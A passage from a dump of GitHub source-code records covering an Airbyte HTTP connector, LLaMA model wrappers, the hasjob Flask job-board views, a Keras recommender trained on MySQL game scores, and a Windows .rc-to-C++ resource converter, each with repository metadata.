skip<T>(int count);\n \"\"\"\n def skip(self, count):\n def _skip(data):\n nonlocal count\n for item in data:\n if count <= 0:\n yield item\n count -= 1\n return self._extend(_skip)\n","repo_name":"hachiko-8ko/join-to-python","sub_path":"src/join_to_python/EnumerableType/Skip.py","file_name":"Skip.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"27098325561","text":"from typing import Any, Dict, Iterable, List, Mapping, MutableMapping, Optional, Tuple\n\nimport pendulum\nimport requests\nfrom airbyte_cdk import AirbyteLogger\nfrom airbyte_cdk.sources import AbstractSource\nfrom airbyte_cdk.sources.streams import Stream\nfrom airbyte_cdk.sources.streams.http import HttpStream\nfrom pendulum import DateTime\nimport genson\n\nclass HttpRequest(HttpStream):\n\n date_field_name = \"date\"\n\n # HttpStream related fields\n cursor_field = date_field_name\n primary_key = \"\"\n\n def __init__(self, baseUrl: str, conf: Mapping[str, Any]):\n super().__init__()\n self._url_base = baseUrl\n print(f\"BASE URL : {baseUrl}\")\n if \"start_date\" in conf:\n self._start_date = conf[\"start_date\"]\n else:\n self._start_date = None\n if(\"access_key\" in conf):\n self.access_key = conf[\"access_key\"]\n else:\n self.access_key = None\n \n @property\n def url_base(self) -> str:\n print(f\"returning base url {self._url_base}\")\n return self._url_base\n\n def path(\n self, stream_state: Mapping[str, Any] = None, stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None\n ) -> str:\n return \"\"\n\n def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:\n return None\n\n def request_params(self, **kwargs) -> MutableMapping[str, Any]:\n params = {}\n print(\"Getting params\")\n if self.access_key is not None:\n params[\"access_key\"] = self.access_key\n\n return params\n\n def get_json_schema(self) -> Mapping[str, Any]:\n \"\"\"\n :return: A dict of the JSON schema representing this stream.\n\n The default implementation of this method looks for a JSONSchema file with the same name as this stream's \"name\" property.\n Override as needed.\n \"\"\"\n # TODO show an example of using pydantic to define the JSON schema, or reading an OpenAPI spec\n resp = requests.get(self.url_base)\n jsonBody = resp.json()\n s = genson.Schema()\n s.add_object(jsonBody)\n return s.to_dict()\n\n def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:\n response_json = response.json()\n yield response_json\n\n #def stream_slices(self, stream_state: Mapping[str, Any] = None, **kwargs) -> Iterable[Optional[Mapping[str, Any]]]:\n # stream_state = stream_state or {}\n # start_date = pendulum.parse(stream_state.get(self.date_field_name, self._start_date))\n # return chunk_date_range(start_date, self.ignore_weekends)\n\n # def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]):\n # current_stream_state = current_stream_state or {}\n # current_stream_state[self.date_field_name] = max(\n # latest_record[self.date_field_name], current_stream_state.get(self.date_field_name, self._start_date)\n # )\n # return current_stream_state\n\n\n# def chunk_date_range(start_date: DateTime, ignore_weekends: bool) -> Iterable[Mapping[str, Any]]:\n# \"\"\"\n# Returns a list of each day between the start date and now. Ignore weekends since exchanges don't run on weekends.\n# The return value is a list of dicts {'date': date_string}.\n# \"\"\"\n# days = []\n# now = pendulum.now()\n# while start_date < now:\n# day_of_week = start_date.day_of_week\n# if day_of_week != pendulum.SATURDAY and day_of_week != pendulum.SUNDAY or not ignore_weekends:\n# days.append({\"date\": start_date.to_date_string()})\n# start_date = start_date.add(days=1)\n\n# return days\n\n\nclass SourceHttpRequest(AbstractSource):\n def check_connection(self, logger: AirbyteLogger, config: Mapping[str, Any]) -> Tuple[bool, Any]:\n try:\n params = {}\n\n #params[\"access_key\"] = config[\"access_key\"]\n\n resp = requests.get(f\"{config['base_url']}\", params=params)\n status = resp.status_code\n logger.info(f\"Ping response code: {status}\")\n if status == 200:\n return True, None\n # When API requests is sent but the requested data is not available or the API call fails\n # for some reason, a JSON error is returned.\n # https://exchangeratesapi.io/documentation/#errors\n error = resp.json().get(\"error\")\n code = error.get(\"code\")\n message = error.get(\"message\") or error.get(\"info\")\n # If code is base_currency_access_restricted, error is caused by switching base currency while using free\n # plan\n if code == \"base_currency_access_restricted\":\n message = f\"{message} (this plan doesn't support selecting the base currency)\"\n return False, message\n except Exception as e:\n return False, e\n\n def streams(self, config: Mapping[str, Any]) -> List[Stream]:\n return [HttpRequest(config.get(\"base_url\"), config)]\n","repo_name":"Veronneau-Techno-Conseil/airbyte-connectors","sub_path":"json-svc/source_http_request/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11883946492","text":"from typing import Iterable, List, Optional, Union\nfrom pytorch_lightning.loggers import Logger\n\nfrom xturing.engines.llama_engine import (\n LLamaEngine,\n LLamaInt8Engine,\n LlamaLoraEngine,\n LlamaLoraInt8Engine,\n LlamaLoraInt4Engine,\n)\nfrom xturing.models.causal import (\n CausalInt8Model,\n CausalLoraInt8Model,\n CausalLoraModel,\n CausalModel,\n)\nfrom xturing.trainers.base import BaseTrainer\nfrom xturing.datasets.instruction_dataset import InstructionDataset\nfrom xturing.datasets.text_dataset import TextDataset\nfrom xturing.trainers.lightning_trainer import LightningTrainer\n\n\nclass Llama(CausalModel):\n config_name: str = \"llama\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LLamaEngine.config_name, weights_path)\n\n\nclass LlamaLora(CausalLoraModel):\n config_name: str = \"llama_lora\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LlamaLoraEngine.config_name, weights_path)\n\n\nclass LlamaInt8(CausalInt8Model):\n config_name: str = \"llama_int8\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LLamaInt8Engine.config_name, weights_path)\n\n\nclass LlamaLoraInt8(CausalLoraInt8Model):\n config_name: str = \"llama_lora_int8\"\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LlamaLoraInt8Engine.config_name, weights_path)\n\n\nclass LlamaLoraInt4(CausalLoraInt8Model):\n config_name: str = \"llama_lora_int4\"\n\n def _make_trainer(self, dataset: Union[TextDataset, InstructionDataset], \n logger: Union[Logger, Iterable[Logger], bool] = True):\n return BaseTrainer.create(\n LightningTrainer.config_name,\n self.engine,\n dataset,\n self._make_collate_fn(dataset),\n int(self.finetuning_args.num_train_epochs),\n int(self.finetuning_args.batch_size),\n float(self.finetuning_args.learning_rate),\n self.finetuning_args.optimizer_name,\n True,\n True,\n lora_type=32,\n logger=logger,\n )\n\n def __init__(self, weights_path: Optional[str] = None):\n super().__init__(LlamaLoraInt4Engine.config_name, weights_path)\n","repo_name":"karim1104/xturing-202305","sub_path":"src/xturing/models/llama.py","file_name":"llama.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"16064983907","text":"from ipclasses import IpVisual\nfrom usclasses import UsSearchs\n\nclass UsVisual(IpVisual):\n \n def visual(self): \n foo = UsSearchs(self._request, mode=self._mode)\n \n command = { \n 'visualNum' : foo.vis_num,\n 'visualClassify' : foo.vis_cla,\n 'visualIpc' : foo.vis_ipc,\n 'visualPerson' : foo.vis_per\n } \n\n return command[self._mode]()\n","repo_name":"jochangmin22/techvisor","sub_path":"usclasses/usVisualClass.py","file_name":"usVisualClass.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32400966546","text":"import bleach\nfrom datetime import datetime, timedelta\nfrom markdown import markdown\nfrom difflib import SequenceMatcher\n\nfrom flask import (\n abort,\n flash,\n g,\n redirect,\n render_template,\n request,\n url_for,\n session,\n )\nfrom flask.ext.mail import Message\nfrom hasjob import app, forms, mail, lastuser\nfrom hasjob.models import (\n agelimit,\n db,\n JobCategory,\n JobType,\n JobPost,\n JobPostReport,\n POSTSTATUS,\n ReportCode,\n unique_hash,\n )\nfrom hasjob.twitter import tweet\nfrom hasjob.uploads import uploaded_logos\nfrom hasjob.utils import get_email_domain, get_word_bag, md5sum\nfrom hasjob.views import ALLOWED_TAGS\nfrom hasjob.views.display import webmail_domains\n\n\n@app.route('/view/<hashid>', methods=('GET', 'POST'))\ndef jobdetail(hashid):\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if post.status in [POSTSTATUS.DRAFT, POSTSTATUS.PENDING]:\n if post.edit_key not in session.get('userkeys', []):\n abort(403)\n if post.status in [POSTSTATUS.REJECTED, POSTSTATUS.WITHDRAWN]:\n abort(410)\n reportform = forms.ReportForm()\n reportform.report_code.choices = [(ob.id, ob.title) for ob in ReportCode.query.filter_by(public=True).order_by('seq')]\n rejectform = forms.RejectForm()\n if reportform.validate_on_submit():\n report = JobPostReport(post=post, reportcode_id=reportform.report_code.data)\n report.ipaddr = request.environ['REMOTE_ADDR']\n report.useragent = request.user_agent.string\n db.session.add(report)\n db.session.commit()\n if request.is_xhr:\n return \"<p>Thanks! This job listing has been flagged for review.</p>\" # FIXME: Ugh!\n else:\n flash(\"Thanks! This job listing has been flagged for review.\", \"interactive\")\n elif request.method == 'POST' and request.is_xhr:\n return render_template('inc/reportform.html', reportform=reportform, ajaxreg=True)\n return render_template('detail.html', post=post, reportform=reportform, rejectform=rejectform, siteadmin=lastuser.has_permission('siteadmin'), webmail_domains=webmail_domains)\n\n\n@app.route('/reject/<hashid>', methods=('GET', 'POST'))\n@lastuser.requires_permission('siteadmin')\ndef rejectjob(hashid):\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if post.status in [POSTSTATUS.DRAFT, POSTSTATUS.PENDING]:\n if post.edit_key not in session.get('userkeys', []):\n abort(403)\n if post.status in [POSTSTATUS.REJECTED, POSTSTATUS.WITHDRAWN]:\n abort(410)\n rejectform = forms.RejectForm()\n if rejectform.validate_on_submit():\n post.closed_datetime = datetime.utcnow()\n post.review_comments = rejectform.reason.data\n post.review_datetime = datetime.utcnow()\n post.status = POSTSTATUS.REJECTED\n post.reviewer = g.user\n msg = Message(subject=\"Rejection of your job listing at the HasGeek Job Board\",\n recipients=[post.email])\n msg.body = render_template(\"reject_email.md\", post=post)\n msg.html = markdown(msg.body)\n mail.send(msg)\n db.session.commit()\n if request.is_xhr:\n return \"<p>This job listing has been rejected.</p>\"\n else:\n flash(\"This job listing has been rejected\", \"interactive\")\n elif request.method == 'POST' and request.is_xhr:\n return render_template('inc/rejectform.html', post=post, rejectform=rejectform, ajaxreg=True)\n return redirect(url_for('jobdetail', hashid=post.hashid))\n\n\n@app.route('/confirm/<hashid>', methods=('GET', 'POST'))\ndef confirm(hashid):\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n form = forms.ConfirmForm()\n if post.status == POSTSTATUS.REJECTED:\n abort(410)\n elif post.status == POSTSTATUS.DRAFT:\n if post.edit_key not in session.get('userkeys', []):\n abort(403)\n else:\n # Any other status: no confirmation required (via this handler)\n return redirect(url_for('jobdetail', hashid=post.hashid), code=302)\n if 'form.id' in request.form and form.validate_on_submit():\n # User has accepted terms of service. Now send email and/or wait for payment\n if not post.email_sent:\n msg = Message(subject=\"Confirmation of your job listing at the HasGeek Job Board\",\n recipients=[post.email])\n msg.body = render_template(\"confirm_email.md\", post=post)\n msg.html = markdown(msg.body)\n mail.send(msg)\n post.email_sent = True\n post.status = POSTSTATUS.PENDING\n db.session.commit()\n session.get('userkeys', []).remove(post.edit_key)\n session.modified = True # Since it won't detect changes to lists\n session.permanent = True\n return render_template('mailsent.html', post=post)\n return render_template('confirm.html', post=post, form=form)\n\n\n@app.route('/confirm/<hashid>/<key>')\ndef confirm_email(hashid, key):\n # If post is in pending state and email key is correct, convert to published\n # and update post.datetime to utcnow() so it'll show on top of the stack\n # This function expects key to be email_verify_key, not edit_key like the others\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if post.status == POSTSTATUS.REJECTED:\n abort(410)\n elif post.status in [POSTSTATUS.CONFIRMED, POSTSTATUS.REVIEWED]:\n flash(\"This job listing has already been confirmed and published\", \"interactive\")\n return redirect(url_for('jobdetail', hashid=post.hashid), code=302)\n elif post.status == POSTSTATUS.DRAFT:\n # This should not happen. The user doesn't have this URL until they\n # pass the confirm form\n return redirect(url_for('confirm', hashid=post.hashid), code=302)\n elif post.status == POSTSTATUS.PENDING:\n if key != post.email_verify_key:\n abort(403)\n else:\n if app.config.get('THROTTLE_LIMIT', 0) > 0:\n post_count = JobPost.query.filter(JobPost.email_domain == post.email_domain).filter(\n JobPost.status > POSTSTATUS.PENDING).filter(\n JobPost.datetime > datetime.utcnow() - timedelta(days=1)).count()\n if post_count > app.config['THROTTLE_LIMIT']:\n flash(u\"We've received too many listings from %s in the last 24 hours. Please try again in a few hours. \"\n \"If you believe this to be an error, please email us at %s.\" % (post.email_domain,\n app.config['SUPPORT_EMAIL']), category='info')\n return redirect(url_for('index'))\n post.email_verified = True\n post.status = POSTSTATUS.CONFIRMED\n post.datetime = datetime.utcnow()\n db.session.commit()\n if app.config['TWITTER_ENABLED']:\n try:\n tweet(post.headline, url_for('jobdetail', hashid=post.hashid,\n _external=True), post.location)\n flash(\"Congratulations! Your job listing has been published and tweeted\",\n \"interactive\")\n except: # FIXME: Catch-all\n flash(\"Congratulations! Your job listing has been published \"\n \"(Twitter was not reachable for tweeting)\", \"interactive\")\n else:\n flash(\"Congratulations! Your job listing has been published\", \"interactive\")\n return redirect(url_for('jobdetail', hashid=post.hashid), code=302)\n\n\n@app.route('/withdraw/<hashid>/<key>', methods=('GET', 'POST'))\ndef withdraw(hashid, key):\n # TODO: Support for withdrawing job posts\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n form = forms.WithdrawForm()\n if key != post.edit_key:\n abort(403)\n if post.status == POSTSTATUS.WITHDRAWN:\n flash(\"Your job listing has already been withdrawn\", \"info\")\n return redirect(url_for('index'), code=303)\n if post.status not in [POSTSTATUS.CONFIRMED, POSTSTATUS.REVIEWED]:\n flash(\"Your post cannot be withdrawn because it is not public\", \"info\")\n return redirect(url_for('index'), code=303)\n if form.validate_on_submit():\n post.status = POSTSTATUS.WITHDRAWN\n post.closed_datetime = datetime.utcnow()\n db.session.commit()\n flash(\"Your job listing has been withdrawn and is no longer available\", \"info\")\n return redirect(url_for('index'), code=303)\n return render_template(\"withdraw.html\", post=post, form=form)\n\n\n@app.route('/edit/<hashid>/<key>', methods=('GET', 'POST'))\ndef editjob(hashid, key, form=None, post=None, validated=False):\n if form is None:\n form = forms.ListingForm(request.form)\n form.job_type.choices = [(ob.id, ob.title) for ob in JobType.query.filter_by(public=True).order_by('seq')]\n form.job_category.choices = [(ob.id, ob.title) for ob in JobCategory.query.filter_by(public=True).order_by('seq')]\n if post is None:\n post = JobPost.query.filter_by(hashid=hashid).first_or_404()\n if key != post.edit_key:\n abort(403)\n # Don't allow email address to be changed once its confirmed\n if request.method == 'POST' and post.status >= POSTSTATUS.PENDING:\n form.poster_email.data = post.email\n if request.method == 'POST' and (validated or form.validate()):\n form_description = bleach.linkify(bleach.clean(form.job_description.data, tags=ALLOWED_TAGS))\n form_perks = bleach.linkify(bleach.clean(form.job_perks_description.data, tags=ALLOWED_TAGS)) if form.job_perks.data else ''\n form_how_to_apply = form.job_how_to_apply.data\n form_email_domain = get_email_domain(form.poster_email.data)\n form_words = get_word_bag(u' '.join((form_description, form_perks, form_how_to_apply)))\n\n similar = False\n for oldpost in JobPost.query.filter(JobPost.email_domain == form_email_domain).filter(\n JobPost.status > POSTSTATUS.PENDING).filter(\n JobPost.datetime > datetime.utcnow() - agelimit).all():\n if oldpost.id != post.id:\n if oldpost.words:\n s = SequenceMatcher(None, form_words, oldpost.words)\n if s.ratio() > 0.6:\n similar = True\n break\n\n if similar:\n flash(\"This listing is very similar to an earlier listing. You may not relist the same job \"\n \"in less than %d days. If you believe this to be an error, please email us at %s.\" % (agelimit.days,\n app.config['SUPPORT_EMAIL']), category='interactive')\n else:\n post.headline = form.job_headline.data\n post.type_id = form.job_type.data\n post.category_id = form.job_category.data\n post.location = form.job_location.data\n post.relocation_assist = form.job_relocation_assist.data\n post.description = form_description\n post.perks = form_perks\n post.how_to_apply = form_how_to_apply\n post.company_name = form.company_name.data\n post.company_url = form.company_url.data\n post.email = form.poster_email.data\n post.email_domain = form_email_domain\n post.md5sum = md5sum(post.email)\n post.hr_contact = form.hr_contact.data\n # To protect from gaming, don't allow words to be removed in edited listings once the post\n # has been confirmed. Just add the new words.\n if post.status >= POSTSTATUS.CONFIRMED:\n prev_words = post.words or ''\n else:\n prev_words = u''\n post.words = get_word_bag(u' '.join((prev_words, form_description, form_perks, form_how_to_apply)))\n\n if request.files['company_logo']:\n # The form's validator saved the processed logo in g.company_logo.\n thumbnail = g.company_logo\n logofilename = uploaded_logos.save(thumbnail, name='%s.' % post.hashid)\n post.company_logo = logofilename\n else:\n if form.company_logo_remove.data:\n post.company_logo = None\n\n db.session.commit()\n userkeys = session.get('userkeys', [])\n userkeys.append(post.edit_key)\n session['userkeys'] = userkeys\n session.permanent = True\n return redirect(url_for('jobdetail', hashid=post.hashid), code=303)\n elif request.method == 'POST':\n flash(\"Please correct the indicated errors\", category='interactive')\n elif request.method == 'GET':\n # Populate form from model\n form.job_headline.data = post.headline\n form.job_type.data = post.type_id\n form.job_category.data = post.category_id\n form.job_location.data = post.location\n form.job_relocation_assist.data = post.relocation_assist\n form.job_description.data = post.description\n form.job_perks.data = True if post.perks else False\n form.job_perks_description.data = post.perks\n form.job_how_to_apply.data = post.how_to_apply\n form.company_name.data = post.company_name\n form.company_url.data = post.company_url\n form.poster_email.data = post.email\n form.hr_contact.data = int(post.hr_contact or False)\n\n return render_template('postjob.html', form=form, no_email=post.status > POSTSTATUS.DRAFT)\n\n\n@app.route('/new', methods=('GET', 'POST'))\ndef newjob():\n form = forms.ListingForm()\n form.job_type.choices = [(ob.id, ob.title) for ob in JobType.query.filter_by(public=True).order_by('seq')]\n form.job_category.choices = [(ob.id, ob.title) for ob in JobCategory.query.filter_by(public=True).order_by('seq')]\n #if request.method == 'POST' and request.form.get('form.id') == 'newheadline':\n # POST request from the main page's Post a Job box.\n #form.csrf_token.data = form.generate_csrf_token(session)\n if request.method == 'POST' and request.form.get('form.id') != 'newheadline' and form.validate():\n # POST request from new job page, with successful validation\n # Move it to the editjob page for handling here forward\n post = JobPost(hashid = unique_hash(JobPost),\n ipaddr = request.environ['REMOTE_ADDR'],\n useragent = request.user_agent.string)\n db.session.add(post)\n return editjob(post.hashid, post.edit_key, form, post, validated=True)\n elif request.method == 'POST' and request.form.get('form.id') != 'newheadline':\n # POST request from new job page, with errors\n flash(\"Please correct the indicated errors\", category='interactive')\n\n # Render page. Execution reaches here under three conditions:\n # 1. GET request, page loaded for the first time\n # 2. POST request from main page's Post a Job box\n # 3. POST request from this page, with errors\n return render_template('postjob.html', form=form, no_removelogo=True)\n","repo_name":"seanbradley/hasjob","sub_path":"hasjob/views/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":15151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"4370754920","text":"import numpy as np\n\ndef coord_to_xyz(coord: np.ndarray, types: list)->str:\n \"\"\"Convert coordinates and types to xyz format.\n \n Parameters\n ----------\n coord: np.ndarray\n coordinates, Nx3 array\n types: list\n list of types\n \n Returns\n -------\n str\n xyz format string\n \n Examples\n --------\n >>> coord_to_xyz(np.ones((1,3)), [\"C\"])\n 1\n\n C 1.000000 1.000000 1.000000\n \"\"\"\n buff = [str(len(types)), '']\n for at, cc in zip(types, coord):\n buff.append(\"{} {:.6f} {:.6f} {:.6f}\".format(at, *cc))\n return \"\\n\".join(buff)\n","repo_name":"salinelake/dpdata","sub_path":"dpdata/xyz/xyz.py","file_name":"xyz.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"37766297841","text":"# -*- coding: utf-8 -*-\r\n#using python 3\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport math\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Embedding,Dropout,Dense,Reshape,Merge,Concatenate\r\nfrom sqlalchemy import create_engine\r\nimport pymysql\r\n\r\n\r\n\r\nk=128\r\n#数据预处理,将原始数据划分为6个等级\r\npymysql.install_as_MySQLdb()\r\nengine = create_engine(\r\n 'mysql+mysqldb://root:root@192.168.10.14:3306/com66nao_cloud?charset=utf8')\r\ndf4 = pd.read_sql('select user_id as user_truename,train_score as score ,cogn_task.name as name ,cloud_cat.name as firstbrain from user_train_history join cogn_task on cogn_task.id=user_train_history.game_id join cloud_cat on cloud_cat.id=cogn_task.label', engine)\r\ndf1 = df4[['user_truename', 'name', 'score']] # 只选取有实际作用的列\r\n#因为在线数据库中有的游戏其实应该是没有上线,一切数值均为0,不应该被纳入考虑,因而删除空值\r\ndf5 = df1 [df1>0]\r\ndf6 = df5.dropna()\r\ngrouped = df6['score'].groupby([df6['user_truename'], df6['name']])\r\ndf2 = grouped.median()\r\ndf3 = df2.reset_index()\r\n\r\n\r\nold_set=np.unique(df3['user_truename'])\r\nold_list=list(old_set)\r\nnew_id=np.arange(len(old_list))\r\ndf3['new_id']=df3['user_truename'].replace(old_list,new_id)\r\ndf3['new_id']=df3['new_id']+1\r\n\r\nprint('OK')\r\n\r\nold_gameset = np.unique(df3['name'])\r\nold_gamelist = list(old_gameset)\r\nfid = np.arange(len(old_gamelist))\r\ndf3['fid'] = df3['name'].replace(old_gamelist,fid)\r\ndf3['fid'] = df3['fid']+1\r\n\r\n\r\nprint(\"ok\")\r\nprint('ik')\r\n\r\n\r\ntables1 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.90)[\"score\"]\r\ntables2 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.70)[\"score\"]\r\ntables3 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.50)[\"score\"]\r\ntables4 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.30)[\"score\"]\r\ntables5 = pd.pivot_table(df3, index='fid', values='score', aggfunc=lambda x: (np.max(x) - np.min(x)) * 0.10)[\"score\"]\r\ntotal_score = pd.DataFrame([tables1, tables2, tables3, tables4, tables5])\r\nfinal_score = total_score.T\r\n\r\nfinal_score.columns = ['a', 'b', 'c', 'd', 'e']\r\n\r\nfinal_score[\"fid\"] = final_score.index\r\n\r\nscore_table = pd.merge(final_score, df3, on=\"fid\")\r\nprint(\"ok\")\r\nscore_table.loc[(score_table[\"score\"] < score_table['e']), 'score'] = 6 #\r\nscore_table.loc[(score_table[\"score\"] >= score_table['e']) & (score_table[\"score\"] < score_table['d']), 'score'] = 5\r\nscore_table.loc[(score_table[\"score\"] >= score_table['d']) & (score_table[\"score\"] < score_table['c']), 'score'] = 4\r\nscore_table.loc[(score_table[\"score\"] >= score_table['c']) & (score_table[\"score\"] < score_table['b']), 'score'] = 3\r\nscore_table.loc[(score_table[\"score\"] >= score_table['b']) & (score_table[\"score\"] < score_table['a']), 'score'] = 2\r\nscore_table.loc[(score_table[\"score\"] >= score_table['a']), 'score'] = 1 # 将所有的得分离散化在等级里面\r\nscore_table = score_table[['new_id', 'fid', 'score']] # 只选取有实际作用的列\r\n#n数据读取结束\r\n\r\n\r\n\r\nscore_table.to_csv('E:/lf/score_table.csv',index = None)\r\n\r\nn_users=np.max(score_table['new_id'])\r\nn_movices=int(np.max(score_table['fid']))\r\nprint([n_users,n_movices,len(score_table)])\r\nscore_table.to_csv('E:/scoretable.csv',index = None)\r\nmodel1=Sequential()\r\nmodel1.add(Embedding(n_users+1,k,input_length=1))\r\nmodel1.add(Reshape((k,)))\r\nmodel2=Sequential()\r\nmodel2.add(Embedding(n_movices+1,k,input_length=1))\r\nmodel2.add(Reshape((k,)))\r\nmodel=Sequential()\r\nmodel.add(Merge([model1,model2],mode='concat'))#然后加入Dropout 和relu 这个非线性变换项,构造多层深度模型。\r\n#model.add(Concatenate([model1, model2]))\r\n#x = concatenate([a, b], axis=-1)\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(k, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(int(k / 4), activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(int(k / 16), activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(6, activation = 'softmax'))#因为是预测连续变量评分,最后一层直接上线性变化\r\nmodel.compile(loss='categorical_crossentropy',optimizer='adam')\r\n\r\n\r\n\r\n\r\nusers=score_table['new_id'].values\r\nmovices=score_table['fid'].values\r\ny=score_table['score'].values\r\n\r\nfrom keras.utils import np_utils\r\nnb_classes = 6\r\ny_train = np_utils.to_categorical(y, nb_classes)\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nx_train_users, x_test_users,x_train_movices, x_test_movices,y_train, y_test = train_test_split(users, movices, y,test_size=0.2, random_state=None)\r\nx_train = [x_train_users,x_train_movices]\r\nx_test = [x_test_users,x_test_movices]\r\nx = [users,movices]\r\nmodel.fit(x_train,y_train,batch_size=100,epochs=10)\r\n\r\n\r\nprint(\"training is start\")\r\nmodel.save_weights('model629.h5')\r\njson_string = model.to_json()\r\nwith open(\"model629.json\", \"w\") as json_file:\r\n json_file.write(json_string)\r\n\r\n\r\n\r\n\r\ntraincost = model.evaluate(x_train,y_train)\r\nprint('traincost:',traincost)\r\n\r\ntestcost = model.evaluate(x_test,y_test)\r\nprint('testcost:',testcost)\r\n\r\nallcost = model.evaluate(x,y)\r\nprint('allcost:',allcost)\r\n\r\n\r\n#这是总的均方误差,而不是测试集的均方误差\r\nsum =0\r\npredictions = []\r\nfor i in range(score_table.shape[0]):\r\n predictions.append(model.predict([np.array([score_table['new_id'][i]]), np.array([score_table['fid'][i]])]))\r\n sum += (score_table['score'][i] - model.predict([np.array([score_table['new_id'][i]]), np.array([score_table['fid'][i]])])) ** 2\r\nmse = math.sqrt(sum/score_table.shape[0])\r\nprint(\"手算均方误差是\",mse)\r\n\r\n\r\npred1 = model.predict([np.array([10]),np.array([1])])\r\nprint('[11,1]的预测值:',[np.array([10]),np.array([1])],' ',pred1)\r\n\r\npred2 = model.predict([np.array([score_table['new_id'][0]]), np.array([score_table['fid'][0]])])\r\nprint('[11,1]的预测值:',[np.array([10]),np.array([1])],' ',pred2)\r\n\r\npred3 = model.predict([np.array([users[10]]),np.array([movices[1]])])\r\nprint('[11,1]的预测值:',[np.array([10]),np.array([1])],' ',pred3)\r\n\r\npd_predictions = pd.Series(predictions)\r\npd_predictions.to_csv('E:/lf/pd_predictions.csv',index = None)\r\n\r\nprint('ok')\r\n\r\n","repo_name":"zhuanglichun/LIULIUNAO","sub_path":"tensorflow_deep_copy629.py","file_name":"tensorflow_deep_copy629.py","file_ext":"py","file_size_in_byte":6333,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"7014734325","text":"#!/usr/bin/python3\n\nfrom sys import argv\nfrom os.path import exists\n\nstr_table = []\ntext = []\ndefs = []\n\n\ndef parseRC(rcFile):\n ret_incl = []\n with open(rcFile, 'r', encoding='utf-8') as f:\n cur_lst = None\n str_id = None\n txt = None\n for ln in f.readlines():\n if ln.lower().startswith(u'#include'):\n n = ln.split('\"')\n ret_incl.append(n[1].replace(u'\\\\', u'/'))\n if u'stringtable' in ln.lower():\n cur_lst = str_table\n if u'end' == ln.lower():\n cur_lst = None\n if ln.startswith(u' ') and cur_lst is not None:\n n = ln.strip(u'\\n').split(u'\"')\n if str_id is None:\n str_id = n[0].strip()\n if len(n) == 1:\n continue\n txt = u'\"'.join(n[1:-1])\n cur_lst.append((str_id, txt))\n str_id = None\n txt = None\n return ret_incl\n\n\ndef parseH(hFile):\n try:\n with open(hFile, u'r') as h:\n for line in h.readlines():\n defs.append(line.strip(u'\\n'))\n except Exception:\n pass\n\n\ndef getIncludes(base, paths, includes):\n ret_incl = []\n # fetching includes and dropping them directly into the generated file\n for i in includes[:]:\n inc = u''\n for p in paths:\n if exists(u'/'.join([base, p, i])):\n inc = u'/'.join([base, p, i])\n break\n if exists(u'/'.join([p, i])):\n inc = u'/'.join([p, i])\n break\n if exists(u'/'.join([base, i])):\n inc = u'/'.join([base, i])\n if len(inc) < 1:\n notice(u'not found: {0}'.format(i))\n continue\n if u'.h' in i.lower():\n notice(u'including: {0}'.format(inc))\n parseH(inc)\n if u'.rc' in i.lower():\n notice(u'including: {0}'.format(inc))\n ret_incl.extend(parseRC(inc))\n return ret_incl\n\n\ndef notice(msg):\n global verbose\n if verbose:\n print(msg)\n\n\nverbose = False\nmain_rc = u''\npaths = [u'.']\nfor p in argv:\n if '-v' in p:\n verbose = True\n if p.lower().endswith(u'rc'):\n main_rc = p\n continue\n paths.append(p)\n\nbase = u'/'.join(main_rc.split('/')[:-1])\n\nincludes = parseRC(main_rc)\nwhile len(includes) > 0:\n includes = getIncludes(base, paths, includes[:])\n\n\nwith open(main_rc.split(u'/')[-1] + u'.cpp', 'w', encoding='utf-8') as o:\n o.write(u'''/*\n my template c++ file which implements the internal resource\n lookup and storage\n*/\n\n#include \"dynres.h\"\n#include <string>\n#include <cinttypes>\n#include <utility>\n#include <algorithm>\n#include <vector>\n''')\n for i in defs:\n o.write(u'{0}'.format(i)+'\\n')\n o.write('''\n\nstd::vector<std::pair<uint32_t,const char*>> str_tab {\n''')\n for x in str_table:\n o.write(u' std::make_pair({0},\"{1}\"),\\n'.format(x[0], x[1]))\n 